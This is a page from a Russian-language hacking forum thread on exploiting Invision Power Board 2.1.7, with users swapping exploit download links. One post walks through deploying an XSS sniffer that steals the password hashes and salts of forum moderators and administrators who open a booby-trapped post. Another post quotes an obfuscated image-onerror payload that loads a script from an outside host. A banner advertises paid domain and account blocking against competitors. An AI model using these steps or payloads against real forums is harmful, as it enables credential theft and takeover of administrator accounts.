Форум АНТИЧАТ - Invision Power Board 2.1.7 Exploit

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Invision Power Board 2.1.7 Exploit

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

30.07.2008, 12:21

Shred

Участник форума

Регистрация: 22.05.2006

Сообщений: 232

Провел на форуме:
561037

Репутация: 73

Цитата:

Сообщение от DDoSька

Вот тебе решение без геммороя
http://na-s.ru/

пага нереально долго грузится

, у тебя нормально сервис работает?

#12

31.07.2008, 05:38

_Sanich

Новичок

Регистрация: 11.02.2008

Сообщений: 12

Провел на форуме:
60366

Репутация: 3

Цитата:

Сообщение от DDoSька

Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен!

http://www.milw0rm.com/exploits/2010

Последний раз редактировалось _Sanich; 31.07.2008 в 05:44..

#13

24.08.2008, 11:49

PandoraBox

Постоянный

Регистрация: 06.05.2007

Сообщений: 393

Провел на форуме:
1510937

Репутация: 398

Отправить сообщение для PandoraBox с помощью ICQ

Код HTML:

Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/

Открываем ya.js блокнтом, правим путь до host/path/ya.gif , в данном случае пишем http://localhost/sniff/ya.gif, на файл data.txt выставляем права 666.
Затем заходим на xss.php и прописываем полный путь http://localhost/sniff/ya.js и жмем кнопку - попробуй ее не найти она там одна - и получаем код.
Нашим юзером заходим на форум, постим это сообщение и ждем когда его прочитают модеры.
В случае если ктото с модераторскими - или выше - правами зайдет в нашу тему, скрипт получит хеши и соли всего администраторского состава, все это вы можете посмотреть на view.php

www.underwater.itdefence.ru/isniff.rar
www.milw0rm.com/sploits/2008-isniff.rar

Последний раз редактировалось PandoraBox; 24.08.2008 в 11:56..

#14

13.05.2009, 00:50

Менеджер

Новичок

Регистрация: 16.04.2009

Сообщений: 3

Провел на форуме:
136843

Репутация: 0

Сделал пост.
Не сработало.
Форум изменил код на:
<img src="http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElemen tsByTagName(String.fromCharCode(104,101,97,100)).i tem(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif" border="0" alt="Изображение" />

Форум пропатченный?
Я правильно понимаю, что нужно искать другую уязвимость?

Я новичек.

#15

16.08.2009, 14:48

eNergy

Участник форума

Регистрация: 21.07.2007

Сообщений: 202

Провел на форуме:
915622

Репутация: 93

Отправить сообщение для eNergy с помощью ICQ

перезалейте файл http://www.underwater.itdefence.ru/isniff.rar

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit	Rebz	Форумы	10	04.05.2009 15:49
Взлом форумов IPB (Invision Power Board) < 2.0.4	Ice_Fro$T	Форумы	19	18.11.2006 09:19
Invision Power Board Army System Mod 2.1 SQL Injection Exploit	+toxa+	Форумы	10	02.03.2006 19:53
Invision Power Board. SQL injection exploit	-SX-	Форумы	24	04.06.2005 14:32
Сколько полей в таблице ibf_topics в форуме Invision Power Board 1.3.1?	LittleLamer	Форумы	2	29.01.2005 03:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход